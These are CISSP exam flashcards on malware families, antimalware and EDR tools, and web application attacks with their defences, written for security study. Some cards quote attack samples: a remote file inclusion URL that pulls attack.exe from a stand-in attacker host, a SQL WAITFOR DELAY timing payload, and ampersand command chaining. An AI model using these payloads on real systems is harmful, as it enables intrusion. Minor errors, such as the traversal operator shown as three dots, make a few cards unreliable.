CISSP ch 21 Flashcards
Virus functions
two main functions – propagation and payload execution
MBR (virus)
master boot record virus
One of the earliest known forms of infection
Attack the MBR – the portion of bootable media (e.g., hard disk or flash drive) that the computer uses to load the operating system during the boot process
MBR is extremely small, usually 512 bytes, can’t contain all the code required to implement the virus’ propagation and destructive functions
To bypass space limitation, store the majority of their code on another portion of the storage media
When system reads the infected MBR, virus instructs it to read and execute the code stored in this alternate location
Most MBR viruses are spread between systems through the use of infected media inadvertently shared between users
If the infected media is in the drive during the boot process, the target system reads the infected MBR, and the virus loads into memory, infects the MBR on the target’s system’s hard drive
Master boot record
not the boot sector
MBR is a single disk sector, normally the first sector of the media that is read in the initial stages of the boot process. MBR then determines which media partition contains the operating system and then directs the system to read that partition’s boot sector to load the operating system. Viruses can attack both the MBR and the boot sector, with similar results
File infector virus
Viruses that infect different types of executable files and trigger when the operating system attempts to execute them
Windows-based systems, viruses affect executable files and scripts:
.exe
.com
.msc
Standard file infector viruses that do not use cloaking techniques such as stealth or encryption are often easily detected by comparing file characteristics (size, modification date) before and after infection or by comparing hash values
Companion virus
Variation of the file infector virus
Self-contained executable files that escape detection by using a filename similar to, but slightly different from, a legitimate operating system file
Rely on the default file name extensions that Windows-based operating systems append to commands when executive program files (in this order)
.com
.exe
.bat
E.g., replacing game.exe with game.com – if you open a command prompt and simply type GAME, the operating system would execute the virus file (game.com) instead of game.exe
VBA
visual basic for applications = programming language used by scripting functionalities
Macro viruses
Leverages scripting functionality implemented in common software applications
E.g., Melissa Virus in 1999 and I Love You Virus in 2000 spread through Word Document that exploited a vulnerability in Outlook to replicate
Service injection virus
Inject themselves into trusted runtime processes of the operating system, such as svchost.exe, winlogon.exe and explorer.exe
Bypasses detection by any antivirus software running on the host
Best protection: ensure that all software allowing the viewing of web content (browsers, media players, helper applications) receives current security patches
Multipartite viruses
Use more than one propagation technique
E.g., virus might infect critical COM and EXE files by adding malicious code to each file (file infector virus), then write malicious code to the system’s master boot record (boot sector virus)
stealth viruses
Hide themselves by actually tampering with the operating system to fool antivirus packages into thinking that everything is functioning normally
E.g., overwriting the system’s master boot record but then modifying the operating system’s file access functionality to cover its tracks
polymortphic viruses
Modify their own code as they travel from system to system
Propagation and destruction techniques remain the same, but the signature of the virus is somewhat different each time it infects a new system
Current versions of anti-virus software are able to detect known polymorphic viruses
encrypted viruses
Use cryptographic techniques to avoid detection
In their outward appearance, quite similar to polymorphic viruses, each infected system has a virus with a different signature
However, do not generate these modified signatures by changing their code, instead they alter the way they are stored on the disk
Use a very short segment of code, known as the virus decryption routine, which contains the cryptographic information necessary to lead and decrypt the main virus code stored elsewhere on the disk. Each infection utilizes a different cryptographic key, causing the main code to appear completely different on each system.
However, the virus decryption routines often contain telltale signatures that render them vulnerable to updated antivirus software packages
trojan horses
software program that appears benevolent but carries a malicious, behind-the-scenes payload that has the potential to wreak havoc on a system or network
RATs
Remote access Trojans = open backdoors in systems that grant the attacker remote administrative control of the infected systems
E.g., a RAT might open a Secure Shell (SSH) port on a system that allows the attacker to use a preconfigured account to access the system and then send a notice to the attacker that the system is ready and waiting for a connection
cryptomalware
designed to steal computing power from infected systems for use in mining Bitcoin or other cryptocurrencies
worms
contain same destructive potential as other malicious code objects with an added twist – they propagate themselves without requiring any human intervention
PUPs
potentially unwanted programs = software that a user might consent to installing on their system that then carries out functions that the user did not desire or authorize
Scripting technology
automate input of commands = also available to improve the efficiency of malicious actors = commonly found in a class of malware known as fileless malware
Fileless malware
never write files to disk, making them more difficult to detect = e.g., link might exploit a browser vulnerability to execute code that downloads and runs a PowerShell script entirely in memory, where it triggers a malicious payload
Antivirus responses to detection
If the software can eradicate the virus, it disinfects the affected files and restores the machine to a safe condition
If the software recognizes the virus but doesn’t know how to disinfect the files, it may quarantine the files until the user or an administrator can examine them manually
If security setting/policies do not provide for the quarantine or the files exceed a predefined danger threshold, the antivirus package may delete the infected files in an attempt to preserve system integrity
File integrity monitoring tools
secondary anti-virus functionality = designed to alert administrator to unauthorized file modifications = maintain a database of hash values for al files stored on the system, archived hash values are then compared to current computed values to detect any files that were modified between two periods
EDR
endpoint detection and response packages = go beyond traditional antimalware protection to help protect endpoints against attack = contain antimalware capabilities found in traditional antirvirus packages with advanced techniques designed to better detect threats and take steps to eradicate them, some specific capabilities include:
Analyzing endpoint memory, filesystem, and network activity for signs of malicious activity
Automatically isolating possible malicious activity to contain the potential damage
Integration with threat intelligence sources to obtain a real-time insight into malicious behavior elsewhere on the internet
Integration with other incident response mechanisms to automate response efforts
MDR
managed detection and response services = where security vendors offer EDR capabilities and also provide installation, configuration, and monitoring services to reduce load on customer security teams
UEBA
user and entity behavior analytics packages
pay particular attention to user-based activity on endpoints and other devices, building a profile of each individual’s normal activity and then highlighting deviations from that profile that may indicate a potential compromise
UEBA tools differ from EDR capabilities in that UEBA has an analytic focus on the user, whereas EDR has an analytic focus on the endpoint
buffer overflow vulnerabilities
exist when a developer does not properly validate user input to ensure that is of an appropriate size, input that is too large can “overflow” a data structure to affect other data sored in the computer’s memory
can corrupt other data stored in memory or at worst, be used to overwrite system commands, allowing attacker to execute targeted commands on the server
buffer overflow defenses
The user can’t enter a value longer than the size of any buffer that will hold it
The user can’t enter an invalid value for the variable types that will hold it
The user can’t enter a value that will cause the program to operate outside its specific parameters
CGI
Common Gateway Interface = language that allows unskilled programmers to quickly create interactive web pages = buffer overflow vulnerabilities are especially prevalent in code developed rapidly for the web using this language and other similar languages
TOC and TOU
TOC = time of check = time at which the subject checks on the status of the object, there may be several decisions to make before returning to the object to access it
TOU = time of use = when the decision is made to access the object
TOCTTOU attacks / race conditiosn
when the difference between the TOC and the TOU is large enough for an attacker to replace the original object with another objects that suits their own needs, attacker is racing with the legitimate process to replace the object before it is used = example of a state attack (attack timing, data flow control and transition between on system state to another)
E.g., replacing a data file after its identity has been verified but before data is read
rootkits
common way that attackers wage privilege escalation attacks = freely available on the internet and exploit known vulnerabilities in various operating systems = root is the administrator level
injection vulnerabilities
allows an attacker to supply some type of code to the web application as input and trick the web server into either executing that code or supplying it to another server to execute
SQL injection attacks
attacker sends an unusual request to the web server, usually involving commands, including requests that execute commands that modify records, drop tables, or perform other actions that violate the integrity and/or availability of databases
blind SQL injection
when some SQL injection flaws do not provide the attacker with a means to directly view the results of the attack
blind content-based SQL injection attack
perpetrator sends input to the web application that tests whether the application is interpreting injected code before attempting to carry out an attack
E.g. adding 1=2 and the end of the request to see if the web application is vulnerable (vulnerable if returns no results, means the web server looks past the end of the request)
If vulnerable, attacker can then attempt more malicious queries that alter the contents of the database or perform other unwanted actions
blind timing-based SQL injection attacks
using the amount of time required to process a query as a channel for retrieving information from a database
Attacks depend on delay mechanisms provided by different database platforms. E.g., Microsoft SQL Server’s Transact-SQL allows a user to specify a command such as this:
WAITFOR DELAY ’00:00:15’
This would instruct the database to wait 15 seconds before performing the next action. An application that immediately returns the results is probably not vulnerable to timing-based attacks
Can be used to identify each character of a password, one by one, by instructing the database to wait a certain amount of time if the character is equal to the current letter
Tools like SQLmap and Metasploit automate blind timing-based attacks
Code injection attacks
general class of attacks that include SQL injection attacks = seek to insert attacker-written code into the legitimate code created by a web application developer
LDAP injection attack
ttackers embed commands in text being sent as part of a Lightweight Directory Access Protocol (LDAP) query
focus of the attack is on the back end of an LDAP directory service rather than a database server
XML injection
where the back-end target is an XML application
Commands may attempt to load dynamically linked libraries (DLL) containing malicious code in a DLL injection attack
command injection attacks
where application code reaches back to the operating system to execute a command
an attacker might exploit a flaw in the application and gain the ability to directly manipulate the operating system
E.g., adding an ampersand (&) to indicate that the operating system should execute the text after the ampersand as a separate command, allowing attacker to execute commands (e.g., rm command, used to remove something) by exploiting an input field that is only intended to execute a mkdir command (create new directory command)
Authorization vulnerabilities
allow an attacker to exceed the level of access that they are authorized
OWASP
Open Web Application Security Project = a nonprofit security project focused on improving security for online or web-based applications = maintains a top 10 list of the most critical web application security risks and the top 10 proactive controls to protect against application security issues
Insecure direct object reference
if the application does not perform authorization checks, the user may be permitted to view information that exceeds their authority by editing a query string or a POST request in the URL
Directory traversal attacks
when web servers allow the inclusion of operators that navigate the directory paths and file system access controls don’t properly restrict access to files stored elsewhere on the server
E.g., In Linux operating systems, the … operator in the file path refers to the directory one level higher than the current directory. Directory traversal attacks use this knowledge and attempt to navigate outside of the areas of the filesystem that are reserved for the web server
file inclusion attacks
directory traversal attacks taken to the next level = instead of simply retrieving a file and displaying it, file inclusion attacks actually execute the code contained within a file, allowing the attacker to fool the web server into executing targeted code
local file inclusion attacks
seek to execute code stored in a file located elsewhere on the web server
E.g., a file that the attacker uploaded to a directory on a Windows server
Remote file inclusion attacks
allow the attacker to execute code that is stored on a remote server
Attacker can directly control the code being executed without having to first store a file on the local server
E.g., http://www.mycompany.com/app.php?include=http://evil.attacker.com/attack.exe
Web shells
allow the attacker to execute commands on the server and view the results in the browser = provides the attacker with access to the server over commonly used HTTP and HTTPS ports, making their traffic less vulnerable to detection by security tools, attacker may even repair the initial vulnerability they used to gain access to the server to prevent its discovery by another attacker seeking to take control of the server or by a security team
XSS
cross-site scripting attacks = when web applications allow an attacker to perform HTML injection, inserting their own HTML code into a web page
Reflected XSS
when an application allows reflected input, e.g., adding a script into the ‘name’ field of a form to ‘reflect’ the input
Can be used to embed form input in a link. When a user visits the link, the web page is an authentic website, but executes the script included in the input by the malicious link creator
When creating web applications that allow any type of user input, developers must be sure to perform input validation. Applications should never allows a user to include the
tag in a reflected input field
Output encoding
set of techniques that take user-supplied input and encode it using a series of rules that transform potentially dangerous content into a safe form, e.g., HTML encoding transforms the single quote ‘ character into the encoded string '
specific techniques:
HTML entity encoding
HTML attribute encoding
URL encoding
JavaScript encoding
CSS hex encoding
Stored/Persistent XSS
remain on the server even when the attacker isn’t actively waging an attack = e.g., a user inserts HTML script into a blog post to redirect users to a phishing site, request sensitive information or perform another attack
DOM
Document Object Model environment within a user’s browser = can be modified by XSS attacks without appearing in the HTML code of the web page
Request forgery attacks
exploit trust relationships and attempt to have users unwittingly execute commands against a remote server = come in two forms: CSRF / XSRF and SSRF
CSRF / XSRF
Cross-site request forgery
Exploit the trust that remote sites have in a user’s system to execute commands on the user’s behalf
Makes the reasonable assumption that users are often logged into many different websites at the same time
Attackers then embed code in one website that sends a command to a second website
When the user clicks the link of the first site, they are unknowingly sending a command to the second site
To protect against XSRF attacks is to create web applications that use secure tokens that the attacker would not know to embed in links, and to check the referring URL in requests received from end users and only accept requests that originated from their own site
SSRF
erver-side request forgery
Trick a server into visiting a URL based on user-supplied input
Possible when a web application accepts URLs from user as input and then retrieves information from that URL
If the server has access to non-public URLs, an SSRF attack can unintentionally disclose that information to an attacker
Session hijacking attacks
when a malicious individual intercepts part of the communication between an authorized user and a resource and then uses a hijacking technique to take over the session and assume the identity of the authorized user = common techniques:
Capturing details of the authentication between a client and server and using those details to assume the client’s identity
Tricking the client into thinking the attacker’s system is the server, acting as the intermediary as the client sets up a legitimate connection with the server, and then disconnecting the client (man in the middle)
Accessing a web application using the cookie data of a user who did not properly close the connection or of a poorly designed application that does not properly manage authentication cookies
Input whitelisting
allow listing
Developer describes the exact type of input that is expected from the user and then verifies that the input matches that specification before passing the input to other processes or servers
input blacklisting
block listing
Developers describe potentially malicious input that must be blocked, e.g., HTML tags or SQL commands in user input
metacharacters
characters that have been assigned special programmatic meaning, e.g., single and double quotation marks, open/close square brackets, backslash, semicolon, ampersand, caret (^), dollar sign, period or dot, vertical bar, pipe symbol, question mark, asterisk, plus sign, open/close curly braces, and open/close parentheses
parameter pollution
technique to defeat input validation
sends a web application more than one value for the same input variable
depends on defects in web platforms that don’t handle multiple copies of the same parameter properly
escaping a metacharacter
process of marking the metacharacter as merely a normal or common character, such as a letter or number, thus removing its special programmatic powers
Often done by adding a backslash in front of the character
WAFs
Web application firewalls
Function similarly to network firewalls, but they work at the application layer of the OSI model
In between DMZ and web server DMZ is behind network firewall, which protects internal network and DMZ/web server
Scrutinizes the input headed to the application, performing input validation before passing the input to the web server
parameterized queries
protects against injection attacks = developer prepares an SQL statement and then allows user input to be passed into that statement as carefully defined variables that do not allow the insertion of code (fill in the blanks)
different programming languages have different functions to perform this task:
Java uses the PreparedStatement() function
PHP uses the bindParam() function
stored procedures
similar to parameterized queries but the SQL code is not contained within the application but is stored on the database server, client does not directly send SQL code to the database server, instead client sends arguments to the server, which then inserts those arguments into a precompiled query template
Protects against injection attacks and also improves database performance
tokenization
Replaces personal identifiers that might directly reveal an individual’s identity with a unique identifier using a lookup table
Must keep lookup table secure
code signing
way for developers to confirm the authenticity of their code to end users
Use a cryptographic function to digitally sign their code with their own private key, and then browsers can use the developer’s public key to verify that signature and ensure that the code is legitimate and was not modified by unauthorized individuals
Corresponding public key is included in a digital certificate that is distributed with the application
Does not guarantee that the code came from an authentic source and was not modified. If developer digitally signs malicious code, that code will pass the signature verification process
SKDs
software development kits
collections of software libraries combined with documentation, examples and other resources designed to help programmers get up and running quickly in a development environment, often include specialized utilities designed to help developers design and test code
code libraries
consist of shared code objects that perform related functions (e.g., biology research, financial analysis or social media)
dead code
code is in use in an organization but nobody is responsible for the maintenance of that code and nobody may even know where the original source files reside
code integrity measurement
uses cryptographic hash functions to verify that the code being released into production matches the code that was previously approved
scalability
Applications should be designed so that computing resources they require may be incrementally added to support increasing demand
vertical scaling
scaling up = adding more resources to an existing computing instance
horizontal scaling
scaling out = adding additional instances to a pool
elasticity
Applications should be able to automatically provision resources to scale when necessary and then automatically deprovision those resources to reduce capacity (and cost) when they are no longer needed (scale up and down)
error handling
e.g., try…catch functionality, allows developers to explicitly specify how errors should be handled
overly verbose error handling routines may present a risk, do not explain too much about the inner workings of code (e.g., that database is running the MySQL database engine)
hard-coded credentials
developers may include usernames and passwords in source code
Resource exhaustion
systems consume all of the memory, storage, processing time or other resources available on the system, rendering it disabled or crippled for other uses
memory leak
an application fails to return some memory that is no longer needs, perhaps by simply losing track of an object that is has written to reserved area of memory. If the application continues to do this over a long period of time, it can slowly consume all of the memory available to the system, causing it to crash = rebooting resets the problem, but cycle begins anew
memory pointers
area of memory that stores an address of another location in memory
pointer dereferencing
when an application follows the pointer and accesses the memory referenced by the pointer address
NULL value
what is contained in an empty pointer
NULL pointer exception
caused when the application tries to dereference a NULL pointer
best case: causes program to crash, providing attacker with access to debugging information
worst case: may allow an attacker to bypass security controls
